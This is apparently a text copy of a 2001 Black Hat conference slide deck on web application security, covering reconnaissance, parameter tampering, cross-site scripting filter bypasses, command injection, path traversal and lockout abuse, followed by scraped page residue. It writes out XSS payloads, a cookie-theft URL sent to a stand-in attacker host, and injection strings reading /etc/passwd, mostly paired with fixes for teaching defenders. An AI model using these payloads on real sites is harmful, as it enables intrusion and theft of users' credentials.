Black Hat Europe 2001 Presentation

BlackHat Amsterdam 2001
Web Application Security

The Land that Information Security Forgot.
Presenter: Jeremiah Grossman
Copyright 2001 WhiteHat Security All Rights Reserved
Topics
Web Application Security Landscape
Common Web Application Security

Mistakes
Web Application Attack Methodologies
2001 © WhiteHat
Topics
Web Application Attack Methodologies
Information & Discovery

Input Manipulation & Parameter Tampering
Cross-Site Scripting
System Mis-Configuration
2001 © WhiteHat
But Why!?
•
Easiest way to compromise hosts, networks and
•
users.
•
Widely deployed.
•
No Logs! (POST Request payload)
•
Incredibly hard to defend against or detect.
•
Most don’t think of locking down web
applications.
•
Intrusion Detection is a joke.
•
Firewall? What firewall? I don’t see no any
firewall.
•
Encrypted transport layer does nothing.
•
Best of all, no one is looking anyway.
2001 © WhiteHat
How much easier can it
get!?
Oh right.
Unicode
2001 © WhiteHat
Web Application
The Simple Definition
A web application or web service is a

software application that is
accessible
using a web browser or HTTP(s) user
agent.
2001 © WhiteHat
Web Security Layers
2001 © WhiteHat
The Implementation
E-Commerce Entertainment
Shopping Message Boards
Auctions WebMail
Banking Guest Books
Stock Trading Voting Polls
Just Plain Crazy

Printers
PDA’s
Cell Phones
System
Configuration
.NET/Passport
2001 © WhiteHat
Firewall
2001 © WhiteHat Security, Inc.
Common Web Application
Security Mistakes
2001 © WhiteHat
Trusting Client-Side Data
DO NOT TRUST CLIENT-SIDE DATA!
Trusting Client-Side Data is #1 cause

of vulnerabilities.
Identify all input parameters that

trust client-side data.
2001 © WhiteHat
The Level of Trust

E-Commerce Shopping
Numbers
<input type=hidden value=2149.37>
2149.00
Too much for a new VAIO!
<input type=hidden value=2.99> 2.99
Now On Sale!
2001 © WhiteHat
The Level of Trust

Searches/Queries/Templates
Path
http://foo.com/cgi?val=string&file=/html/name.
db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../
../../etc/passwd
Unescaped Special Characters
! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . >

<
Check for:
Unescaped special characters
within input strings
2001 © WhiteHat
HTML Character Filtering
Proper handling of special characters
> => >

< => <
" => "
& => &
Null characters should all be removed.

%00
More mistakes…
SUID (Does a web application really need root?)
Authentication mechanisms using technologies

such
as JavaScript or ActiveX.
Lack of re-authenticating the user before

issuing new
passwords or performing critical tasks.
Hosting of uncontrolled data on a protected

domain.
2001 © WhiteHat
Information & Discovery
Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance
Spidering/Site Crawling
Site Map Hidden Services

Service Map CGI's and Forms
Documentation Email addresses
Tools: WGET
http://www.gnu.org/software/wget/wget.html
Identifiable Characteristics
Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages
Enormous wealth of information about process

flows, debug command, system types and
configurations.
Error and Response Codes
HTTP Response Headers

Server: IBM/Apache 1.3.19
Cookie Characteristics
Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent
Commonly referred to as “forced browsing” or “CGI

Scanning”.
Directory Browsing Index Listings

http://www.foo.com/dir3/dir2/dir1/file.html
Try:
http://www.foo.com/dir3/dir2/dir1/
http://www.foo.com/dir3/dir2/
http://www.foo.com/dir3/
Tools: Whisker
http://www.wiretrip.net/
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
Network Reconnaissance
WHOIS
ARIN
http://www.arin.net/whois/index.html
Port Scan (Nmap)
http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING)http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)
Input Manipulation Parameter Tampering
"Twiddling Bits."
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers
Bad name given to a dangerous security
issue
Attack targets the user of the system

rather
than the system itself.
Outside client-side languages executing

within
the users web environment with the
same
level of privilege as the hosted site.
Client-Side Scripting
Languages
DHTML (HTML, XHTML, HTML x.0)

Opens all the doors.
JavaScript (1.x) Browser/DOM Manipulation

Java (Applets) Malicious Applets
VBScript Browser/DOM Manipulation
Flash Dangerous Third-Party
Interactivity
ActiveX Let me count the ways…
XML/XSL Another Door Opener
CSS Browser/DOM Manipulation
Accessing the DOM & Outside the DOM
Document Object Model (DOM)
Client-Side languages possess an enormous amount of

power to
access and manipulate the DOM within a browser.
Complex & diverse interconnections create an increased the

level of
access within the DOM.
Increased level of access to read & modify DOM data

ranging
anything from background colors, to a file on your systems,
and
beyond to executing systems calls.
Authentication/Authorization
“Hand in the cookie jar.”
Cookies are restricted to domains (.acme.com)

Uncontrolled data on a restricted domain can access
the cookie data.
JavaScript Expression: "document.cookie"

window.open
document.img.src
Hidden Form Submit
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
Cookie data is passed to a CGI through a GET request to

a off
domain host.
The Scenarios
Trick a user to re-login to a spoofed page
Compromise authentication credentials
Load dangerous of maliscious ActiveX
Re-Direct a user or ALL users
Crash the machine or the browser
CSS Danger
“The Remote Launch Pad.”
Successfully CSS a user via a protected

domain.
Utilizing a Client-Side utility (JavaScript,

ActiveX,
VBScript, etc.), exploit a browser hole to
download
a trojan/virus.
User is unknowingly infected/compromised

within
a single HTTP page load.
Dangerous HTML
“HTML Bad”
<APPLET> Malicious Java Applications

<BODY> Altering HTML Page Characteristics
<EMBED> Embedding Third-Party Applications (Flash, etc.)
<FRAME> Directly calling in other uncontrolled HTML
<FRAMESET> Directly calling in other uncontrolled HTML
<HTML> Altering HTML Page Characteristics
<IFRAME> Directly calling in other uncontrolled HTML
<IMG> SCRing Protocol attacks and other abuses
<LAYER> Directly calling in other uncontrolled HTML
<ILAYER> Directly calling in other uncontrolled HTML
<META> META Refreshes. (Client-Redirects)
<OBJECT> ActiveX (Nuff Said)
<SCRIPT> JavaScript/VBScript Loading
<STYLE> Style Sheet and Scripting Alterations
Dangerous Attributes
“Attributes Bad”
ATTRIBUTE DANGER LIST

(Any HTML Tag that has these attributes)
STYLE
SRC
HREF
TYPE
Filter Bypassing
"JavaScript is a Cockroach"
There are all kinds of input filters web applications

implement to sanitize data.
This section will demonstrate many known ways

input
filter's can be bypassed to perform malicious
functions
such as, cross-scripting, browser-hijacking, cookie
theft,
and others.
Client-Side Scripting (CSS) attacks require the

execution
of either, JavaScript, Java, VBScript, ActiveX, Flash
and
some others.
Testing the Filters
Submit all the raw HTML tags you can find, and
then
view the output results.
Combine HTML with tag attributes, such as

SRC,
STYLE, HREF and OnXXX (JavaScript Event
Handler).
This will show what HTML is allowed, what the

changes were, and possible what dangerous
HTML
can be exploited.
SCRIPT TAG
Description: The script tag is the simplest form

of
inputting JavaScript
Exploit:
<SCRIPT>alert('JavaScript
Executed');</SCRIPT>
Solution: replace all "script" tags.
SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the
expression entered after the colon. Netscape Tested.
Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');">
Solution: Replace "javascript" strings in all SRC & HREF

attributes in HTML tags with another string.
Exp: <IMG SRC="java_script:alert('JavaScript Executed');">

will render this script useless.
Further Information:
Any HTML tag with a SRC attribute will execute this script on
page load or on link activation.
As a further protocol pattern matching, keywords "livescript" and

"mocha" must be
also replaced for the hold the same possibilities.
*** Netscape code names ***

SRCing JavaScript Protocol w/ HTML
Entities
Description: As another derivative of the previous, Decimal HTML entities within

these
strings can cause filter bypass.
Exploit:
<IMG SRC="javasc ript:alert('JavaScript Executed');">
Replacement of entities \10 - \11 - \12 - \13 will also succeed.
Hex instead of Decimal HTML entities will also bypass input filters and execute.
<IMG SRC="javasc&#X0A;ript:alert('JavaScript Executed');">
As well as placing multiple ZERO's in front.

<IMG SRC=javasc
ript:alert('JavaScript Executed');>
Solution:Filter these entities within the string then do your further pattern
matching
AND CURLY
Description:
Obscure Netscape JavaScript execution line. Exact
syntax is
needed to execute.
Exploit:
<IMG SRC="&{alert('JavaScript Executed')};">
Solution:
<IMG SRC="XXalert('JavaScript Executed')};">
or something similar will nullify the problem.
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit:
<style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be
fine.
Exploit: Import dangerous CSS.

<STYLE type=text/css>
@import url(http://server/very_bad.css);
</STYLE>
Solution: Filter and replace the "@import“
Exploit: Import a JavaScript Expression through a style tag.

<style TYPE="text/css">
@import url(javascript:alert('JavaScript Executed')); IE HOLE
</style>
Solution: Again, filter and replace the "@import" and the "javascript:" just to
be safe. 2001 © WhiteHat Security, Inc.
Using CSS
Click to Execute
User must click on a link to execute the script.
(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert(‘JavaScript
Launched’);</SCRIPT>
Mass Injection
All user viewing the page execute the script.
(Guest Books, Message Boards)
Post a JavaScript onto a board
Message <SCRIPT>alert(‘JavaScript
Launched’);</SCRIPT>
Using CSS
Directed Injection
Soon as user load the page, script executes.
(WebMail, HTML Mail, Messaging)
Send an email with…

HELLO <SCRIPT>alert(‘JavaScript Launched’);</SCRIPT>
Holding the door open

(FeedBack, Profiles Pages, anything persistent…)
Load HTML Page with sourced scripts.
<LAYER SRC=“javascript.js”></LAYER>
Twiddling Bits
OS Commands
Meta Characters
Path/Directory Traversal
Power of the Semi-Colon
piping input to the command line.
OS Commands
http://foo.com/app.cgi?email=none@foo.com
Append:
http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/p
asswd
Piping:
http://foo.com/app.cgi?email=none@foo.com+|+less
Re-Direct:
http://foo.com/app.cgi?email=none@foo.com+>+/
Power of Special Characters
Meta Characters
http://foo.com/app.cgi?list=file.txt
Altered:
http://foo.com/app.cgi?list=*
Power of the Dots and Slashes
Path Directory Traversal

http://foo.com/app.cgi?directory=/path/to/data
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passw
d
Double DotDot Slash:

http://foo.com/app.cgi?dir=path/to/data....//….//….
//etc/passwd
More Filter Bypassing
Method Alteration(HEAD, PUT, POST, GET, ect.)
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.
More bits…
Hidden Form Field Manipulation
HTTP Headers (Cookies,

Referers…)
System Mis-Configurations
“patches, patches, and more patches…"
Vendor Patches
Default Accounts
Check:
Web Server permission by directory browsing
Software version from Discovery
Known default accounts in commercial
platforms
BugTraq
Anonymous FTP open on Web Server
Other Dirty Tricks
“Abuse can be far more time consuming, costly and
dangerous”
Mass Account Lockout

Attacks against brute force
3 Time Failure Lock-Out Rule
Purposely fail the 3 attempts again

thousands of accounts. If the login is
sequential, even better.
2001 © WhiteHat
Other Dirty Tricks
“Abuse can be far more time consuming, costly and
dangerous”
Brute Force/Page Sequencing

Attacks against process flow
Use 1 0r 2 pieces of data to get the rest.
Slowly brute force the process for data

aggregation.
2001 © WhiteHat
Thank You
BlackHat and Attendees
Questions?
Jeremiah Grossman
jeremiah@whitehatsec.com
WhiteHat Security
All presentation updates will be available on
www.whitehatsec.com

Black Hat Europe 2001 Presentation

Enviado por

Dados do documento

Descrição original:

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Black Hat Europe 2001 Presentation

Enviado por

Direitos autorais:

Formatos disponíveis

BlackHat Amsterdam 2001

Web Application Security

Presenter: Jeremiah Grossman

Web Application Security Landscape

Common Web Application Security

Web Application Attack Methodologies

Web Application Attack Methodologies

Information & Discovery

A web application or web service is a

Just Plain Crazy

DO NOT TRUST CLIENT-SIDE DATA!

Trusting Client-Side Data is #1 cause

Identify all input parameters that

The Level of Trust

Too much for a new VAIO!

<input type=hidden value=2.99> 2.99

The Level of Trust

! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . >

> => &gt;

Null characters should all be removed.

SUID (Does a web application really need root?)

Authentication mechanisms using technologies

Lack of re-authenticating the user before

Hosting of uncontrolled data on a protected

Site Map Hidden Services

Enormous wealth of information about process

HTTP Response Headers

Commonly referred to as “forced browsing” or “CGI

Directory Browsing Index Listings

Attack targets the user of the system

Outside client-side languages executing

DHTML (HTML, XHTML, HTML x.0)

JavaScript (1.x) Browser/DOM Manipulation

Document Object Model (DOM)

Client-Side languages possess an enormous amount of

Complex & diverse interconnections create an increased the

Increased level of access to read & modify DOM data

Cookies are restricted to domains (.acme.com)

JavaScript Expression: "document.cookie"

Cookie data is passed to a CGI through a GET request to

Trick a user to re-login to a spoofed page

Compromise authentication credentials

Load dangerous of maliscious ActiveX

Re-Direct a user or ALL users

Crash the machine or the browser

Successfully CSS a user via a protected

Utilizing a Client-Side utility (JavaScript,

User is unknowingly infected/compromised

<APPLET> Malicious Java Applications

ATTRIBUTE DANGER LIST

There are all kinds of input filters web applications

This section will demonstrate many known ways

Client-Side Scripting (CSS) attacks require the

Combine HTML with tag attributes, such as

This will show what HTML is allowed, what the

Description: The script tag is the simplest form

Solution: replace all "script" tags.

Exploit: <IMG SRC="javascript:alert('JavaScriptExecuted');">

Solution: Replace "javascript" strings in all SRC & HREF

Exp: <IMG SRC="java_script:alert('JavaScript Executed');">

As a further protocol pattern matching, keywords "livescript" and

*** Netscape code names ***

Description: As another derivative of the previous, Decimal HTML entities within

> => >

* Netscape code names *